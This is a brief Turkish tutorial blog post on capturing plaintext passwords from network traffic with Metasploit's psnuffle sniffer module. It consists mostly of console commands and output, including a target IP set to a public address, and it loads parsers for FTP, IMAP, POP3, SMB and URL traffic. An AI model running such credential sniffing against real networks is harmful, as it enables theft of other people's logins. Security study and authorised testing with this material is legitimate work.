Metasploit Psnuffle ile Password Sniffing
https://kaligunlugu.blogspot.com/2014/03/metasploit-psnuffle-ile-password.html
"Psnuffle" , hat üzerindeki şifreleri yakalayan bir programdır.
Kullanımı ise aşağıdaki gibidir.
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options
Module options (auxiliary/sniffer/psnuffle):
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
msf auxiliary(psnuffle) > set RHOST 93.89.226.21
RHOST => 93.89.226.21
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/metasploit/msf3/data/exploits/psnuffle/ftp.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol IMAP from /opt/metasploit/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /opt/metasploit/msf3/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /opt/metasploit/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....